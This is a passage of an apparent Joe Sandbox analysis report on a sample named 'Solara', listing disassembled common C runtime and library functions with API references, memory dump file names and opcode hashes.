std::_Lockit::_Lockit.LIBCPMT ref: 00C3C880
int.LIBCPMT ref: 00C3C897

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

messages.LIBCPMT ref: 00C3C8BA
std::_Facet_Register.LIBCPMT ref: 00C3C8D1
std::_Lockit::~_Lockit.LIBCPMT ref: 00C3C8F1
Concurrency::cancel_current_task.LIBCPMT ref: 00C3C8FE

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermessages
String ID:
API String ID: 958335874-0
Opcode ID: 8e491b833e0bb378ec2ffd94d6efa614d6075b21c411131fef7fbe56edbfbc3c
Instruction ID: ffa0e72fe77e8afbc91b39e3ba74bac2aa14aabdf1479c64c06ef54dd1e5642a
Opcode Fuzzy Hash: 8e491b833e0bb378ec2ffd94d6efa614d6075b21c411131fef7fbe56edbfbc3c
Instruction Fuzzy Hash: 0001D635D002259BCF04EBA4E851BAE7771AF84310F284108F910AB3D1CF709E45A791

Function 00C3C904 Relevance: 10.5, APIs: 7, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C3C90B
std::_Lockit::_Lockit.LIBCPMT ref: 00C3C915
int.LIBCPMT ref: 00C3C92C

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

messages.LIBCPMT ref: 00C3C94F
std::_Facet_Register.LIBCPMT ref: 00C3C966
std::_Lockit::~_Lockit.LIBCPMT ref: 00C3C986
Concurrency::cancel_current_task.LIBCPMT ref: 00C3C993

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermessages
String ID:
API String ID: 958335874-0
Opcode ID: f8de17b5aee08ee4d55bc6b889c1eb4b218b295f3dc24185d25825b56ae59b12
Instruction ID: 867605e38cde92d6609f2993e56c63734da8851078e8ade9e6be1e760621c9d4
Opcode Fuzzy Hash: f8de17b5aee08ee4d55bc6b889c1eb4b218b295f3dc24185d25825b56ae59b12
Instruction Fuzzy Hash: EB01D235D10325ABCF05FBA4E855BAEB772BF84320F294408F915AB391CF349E419B90

Function 00C3CBED Relevance: 10.5, APIs: 7, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C3CBF4
std::_Lockit::_Lockit.LIBCPMT ref: 00C3CBFE
int.LIBCPMT ref: 00C3CC15

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

moneypunct.LIBCPMT ref: 00C3CC38
std::_Facet_Register.LIBCPMT ref: 00C3CC4F
std::_Lockit::~_Lockit.LIBCPMT ref: 00C3CC6F
Concurrency::cancel_current_task.LIBCPMT ref: 00C3CC7C

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
String ID:
API String ID: 3376033448-0
Opcode ID: b48fc3071901ab447ce896a7f3c7c1bfcad2a5e4015f7bac5bb21dbe08636ea6
Instruction ID: b6794035559651a0ca31b143e3e01f0b5523332fa71c70a9bcc0886b6a790f41
Opcode Fuzzy Hash: b48fc3071901ab447ce896a7f3c7c1bfcad2a5e4015f7bac5bb21dbe08636ea6
Instruction Fuzzy Hash: 5B01F9759002299BCF04FB64E896BBD7771AF84710F180108F915A77D1CF749E46D790

Function 00C3CC82 Relevance: 10.5, APIs: 7, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C3CC89
std::_Lockit::_Lockit.LIBCPMT ref: 00C3CC93
int.LIBCPMT ref: 00C3CCAA

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

moneypunct.LIBCPMT ref: 00C3CCCD
std::_Facet_Register.LIBCPMT ref: 00C3CCE4
std::_Lockit::~_Lockit.LIBCPMT ref: 00C3CD04
Concurrency::cancel_current_task.LIBCPMT ref: 00C3CD11

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
String ID:
API String ID: 3376033448-0
Opcode ID: ad24b69557694cda1ea6c9441f3d5a1bf506867b4d83b36352e2a0871ac91018
Instruction ID: aad0f45d846318f644b64ff75a1072cd5b0e06c16e8eb3333ccb48bda91cc176
Opcode Fuzzy Hash: ad24b69557694cda1ea6c9441f3d5a1bf506867b4d83b36352e2a0871ac91018
Instruction Fuzzy Hash: 9001F9759102259BCF05FBA4E855AFD7B71AF84310F144018F911A7391DF319E42D7A1

Function 00C3CDAC Relevance: 10.5, APIs: 7, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C3CDB3
std::_Lockit::_Lockit.LIBCPMT ref: 00C3CDBD
int.LIBCPMT ref: 00C3CDD4

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

moneypunct.LIBCPMT ref: 00C3CDF7
std::_Facet_Register.LIBCPMT ref: 00C3CE0E
std::_Lockit::~_Lockit.LIBCPMT ref: 00C3CE2E
Concurrency::cancel_current_task.LIBCPMT ref: 00C3CE3B

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
String ID:
API String ID: 3376033448-0
Opcode ID: 803bb835e3b25df15b5c806bb66674b54a47453fe44a9a8d9a437c90d90656f5
Instruction ID: 184d0d08208dece43445aa5b5b099865e3ec3f3adc2cccf0efa92dbb1b1ad1a5
Opcode Fuzzy Hash: 803bb835e3b25df15b5c806bb66674b54a47453fe44a9a8d9a437c90d90656f5
Instruction Fuzzy Hash: 8701D27591022A9BCF05FBA4E951BFEB7B1BF84320F140409FA11AB791CF349E429B90

Function 00C3CD17 Relevance: 10.5, APIs: 7, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C3CD1E
std::_Lockit::_Lockit.LIBCPMT ref: 00C3CD28
int.LIBCPMT ref: 00C3CD3F

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

moneypunct.LIBCPMT ref: 00C3CD62
std::_Facet_Register.LIBCPMT ref: 00C3CD79
std::_Lockit::~_Lockit.LIBCPMT ref: 00C3CD99
Concurrency::cancel_current_task.LIBCPMT ref: 00C3CDA6

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
String ID:
API String ID: 3376033448-0
Opcode ID: 45b464a6ec3bd6795856396ca364eaf4f721588da947047779feedb5781d85f5
Instruction ID: d9a9ede6c95da9d3e0ff8aef46fee99d97d51906597a91aaf6dcb333057864ab
Opcode Fuzzy Hash: 45b464a6ec3bd6795856396ca364eaf4f721588da947047779feedb5781d85f5
Instruction Fuzzy Hash: 8601D635910225DBCB05EBA4D851ABDB771BF85310F140418F915AB391CF309E429B90

Function 00C3D095 Relevance: 10.5, APIs: 7, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C3D09C
std::_Lockit::_Lockit.LIBCPMT ref: 00C3D0A6
int.LIBCPMT ref: 00C3D0BD

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

numpunct.LIBCPMT ref: 00C3D0E0
std::_Facet_Register.LIBCPMT ref: 00C3D0F7
std::_Lockit::~_Lockit.LIBCPMT ref: 00C3D117
Concurrency::cancel_current_task.LIBCPMT ref: 00C3D124

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registernumpunct
String ID:
API String ID: 3064348918-0
Opcode ID: 4f975efbcf4987bde1f478b04351ee781f2a5ea91607e827713ae7e16683ef0a
Instruction ID: 8ae4aa0800fcab0226846dc5bdb79fcbca9ab881827700e861799b7b606989da
Opcode Fuzzy Hash: 4f975efbcf4987bde1f478b04351ee781f2a5ea91607e827713ae7e16683ef0a
Instruction Fuzzy Hash: D301D63591022A9BCF04EBA4F812AFD7771BF84724F144119E912A7391CF349E46A791

Function 00C3D12A Relevance: 10.5, APIs: 7, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C3D131
std::_Lockit::_Lockit.LIBCPMT ref: 00C3D13B
int.LIBCPMT ref: 00C3D152

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

numpunct.LIBCPMT ref: 00C3D175
std::_Facet_Register.LIBCPMT ref: 00C3D18C
std::_Lockit::~_Lockit.LIBCPMT ref: 00C3D1AC
Concurrency::cancel_current_task.LIBCPMT ref: 00C3D1B9

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registernumpunct
String ID:
API String ID: 3064348918-0
Opcode ID: 1926855432f039fa54c8c74abb1374b30be511143b78a21ce8ddd800181d57d4
Instruction ID: eeea980679d6d2f7d031b9488e0d4a842550c8008604158e8c6d876206e286e2
Opcode Fuzzy Hash: 1926855432f039fa54c8c74abb1374b30be511143b78a21ce8ddd800181d57d4
Instruction Fuzzy Hash: 5501F975D00225ABCF05FBA4E815BBD7771BF84720F144508F911A7391CF349E469790

Function 00CA3248 Relevance: 9.2, APIs: 6, Instructions: 248COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?,?,7FFFFFFF,?,00CA3518,?,?,?,?,?,?,?,?,?,?), ref: 00CA32EE
__freea.LIBCMT ref: 00CA3483
__freea.LIBCMT ref: 00CA3489
__freea.LIBCMT ref: 00CA34BF
__freea.LIBCMT ref: 00CA34C5
__freea.LIBCMT ref: 00CA34D5

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: __freea$Info
String ID:
API String ID: 541289543-0
Opcode ID: 242cbb360d3a791b32afd40cdf43ae56c8e8992c6d5544dc48e535fb0d0d6b82
Instruction ID: 0384e3eb24b85282d4f01079817dd5efab3c6c59900fba6b5db880bce4fc47a6
Opcode Fuzzy Hash: 242cbb360d3a791b32afd40cdf43ae56c8e8992c6d5544dc48e535fb0d0d6b82
Instruction Fuzzy Hash: 43711872A042879BDF229E948C61BBFBFB5AF4A31CF244059F824A7281DB35DF019750

Function 00C4E828 Relevance: 9.2, APIs: 6, Instructions: 225COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?,?,?,?), ref: 00C4E8B3
MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00C4E93F
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00C4E9AA
MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00C4E9C6
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00C4EA29
CompareStringEx.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,00000000), ref: 00C4EA46

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: ByteCharMultiWide$CompareInfoString
String ID:
API String ID: 2984826149-0
Opcode ID: 8a7c02717bae3c8bb0dc301ca47f360418524d8f5629fbeff182c09f076cb59d
Instruction ID: 852ee1a80275aeed7c83f7c1a949ef58027f01db47ed05f64e1e2037c241ca4d
Opcode Fuzzy Hash: 8a7c02717bae3c8bb0dc301ca47f360418524d8f5629fbeff182c09f076cb59d
Instruction Fuzzy Hash: E371D132D002299BDF209FA9CC85BEEBFB5FF09354F1A4555E860A7191D7309E00E7A0

Function 00C2C635 Relevance: 9.2, APIs: 6, Instructions: 175COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 00C2C67E
MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 00C2C6E9
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00C2C706
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00C2C745
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00C2C7A4
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00C2C7C7

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: ByteCharMultiStringWide
String ID:
API String ID: 2829165498-0
Opcode ID: 77a73a1492f29231f9996714507fa6707ef86f9e3563d28d951f9ea272be8a3f
Instruction ID: a945f9ff04404d35f872031c170e769d5d8f17438cef83d95c92a6024155bf97
Opcode Fuzzy Hash: 77a73a1492f29231f9996714507fa6707ef86f9e3563d28d951f9ea272be8a3f
Instruction Fuzzy Hash: 8C51BD7250022AABEF205F60ECC5FAF7BB9EF04B90F154129F925E6550E730CE109BA0

Function 00C5C4D1 Relevance: 9.1, APIs: 6, Instructions: 119COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBCMT ref: 00C5C515
DName::operator+.LIBCMT ref: 00C5C521

Part of subcall function 00C567BE: shared_ptr.LIBCMT ref: 00C567DA

DName::operator+=.LIBCMT ref: 00C5C5DF

Part of subcall function 00C5AD63: DName::operator+.LIBCMT ref: 00C5ADCE
Part of subcall function 00C5AD63: DName::operator+.LIBCMT ref: 00C5B098

Part of subcall function 00C566AD: DName::operator+.LIBCMT ref: 00C566CE

DName::operator+.LIBCMT ref: 00C5C59C

Part of subcall function 00C56816: DName::operator=.LIBVCRUNTIME ref: 00C56837

DName::DName.LIBVCRUNTIME ref: 00C5C603
DName::operator+.LIBCMT ref: 00C5C60F

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: Name::operator+$NameName::Name::operator+=Name::operator=shared_ptr
String ID:
API String ID: 2795783184-0
Opcode ID: 179b9fabfa2fc68db8e918fea97bb90e637d2f05ebfa5cf5b50cca8e49de2f17
Instruction ID: 167c54928d2e60b33b3fd596005dce6c4052ee5cf670064a7a645b6d2b787388
Opcode Fuzzy Hash: 179b9fabfa2fc68db8e918fea97bb90e637d2f05ebfa5cf5b50cca8e49de2f17
Instruction Fuzzy Hash: 9841C3BCA00344AFDB14DBE8C891A9D7BF5AB09301F844049EA56D7291EB35AACCD758

Function 00C5B121 Relevance: 9.1, APIs: 6, Instructions: 94COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00C5C625: Replicator::operator[].LIBCMT ref: 00C5C662

DName::operator=.LIBVCRUNTIME ref: 00C5B1CD

Part of subcall function 00C5AD63: DName::operator+.LIBCMT ref: 00C5ADCE
Part of subcall function 00C5AD63: DName::operator+.LIBCMT ref: 00C5B098

DName::operator+.LIBCMT ref: 00C5B187
DName::operator+.LIBCMT ref: 00C5B193
DName::DName.LIBVCRUNTIME ref: 00C5B1D7
DName::operator+.LIBCMT ref: 00C5B1F4
DName::operator+.LIBCMT ref: 00C5B200

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: Name::operator+$NameName::Name::operator=Replicator::operator[]
String ID:
API String ID: 955152517-0
Opcode ID: 3a522d2604200fc74a71386ced39b19bcbe1fb760ff7141efdafe69b9475487c
Instruction ID: 0cbf92e01a1c7ef768fe704b597bdbb5226939e8701a96489a71b8d31cef1c20
Opcode Fuzzy Hash: 3a522d2604200fc74a71386ced39b19bcbe1fb760ff7141efdafe69b9475487c
Instruction Fuzzy Hash: 2A31D2BDA047049FCB14DFA4C855AAEBFF4AF58301F04841DE99697351EB30AE88CB18

Function 00C269A7 Relevance: 9.1, APIs: 6, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C269AE
std::_Lockit::_Lockit.LIBCPMT ref: 00C269B8
int.LIBCPMT ref: 00C269CF

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

std::_Facet_Register.LIBCPMT ref: 00C26A09
std::_Lockit::~_Lockit.LIBCPMT ref: 00C26A29
Concurrency::cancel_current_task.LIBCPMT ref: 00C26A36

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: 12a1d01d644e1ea6623e725fdce3b581c549e5e14f99fc8fb603ce0e393091b4
Instruction ID: 105c0ccc54d34843875e03ffb482cd2645a76024a2d5f701af30612b49e26ccc
Opcode Fuzzy Hash: 12a1d01d644e1ea6623e725fdce3b581c549e5e14f99fc8fb603ce0e393091b4
Instruction Fuzzy Hash: BB11D371900235ABCF04FB68E802BAE77B5EF84714F244009F915AB781DF709E42A7A1

Function 00C549C8 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00C549BF,00C50FAE,00C4FF4B), ref: 00C549D6
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00C549E4
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00C549FD
SetLastError.KERNEL32(00000000,00C549BF,00C50FAE,00C4FF4B), ref: 00C54A4F

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 0a76b9260355dd97975409c02e99d907a916f8d7194bfc902c9605540d97251a
Instruction ID: 0af76ea86f0450442438e6e6ebf86636291a43c112ec9e4d380f7149dc07c31d
Opcode Fuzzy Hash: 0a76b9260355dd97975409c02e99d907a916f8d7194bfc902c9605540d97251a
Instruction Fuzzy Hash: C301D83A1083116EA7792BF47CC5B2F2A56EB4177BF200329F925860E1EF214DC9B14D

Function 00C4A3D7 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C4A3DE
std::_Lockit::_Lockit.LIBCPMT ref: 00C4A3E8
int.LIBCPMT ref: 00C4A3FF

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

std::_Facet_Register.LIBCPMT ref: 00C4A439
std::_Lockit::~_Lockit.LIBCPMT ref: 00C4A459
Concurrency::cancel_current_task.LIBCPMT ref: 00C4A466

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: afebd920092796c9420e349ed46318ca2dc185c9322ea75b28bd210f81914635
Instruction ID: 75e42de0bfa8d08e238eb5fae5bc75252c291d1b246f737ff65342961a8e0b4e
Opcode Fuzzy Hash: afebd920092796c9420e349ed46318ca2dc185c9322ea75b28bd210f81914635
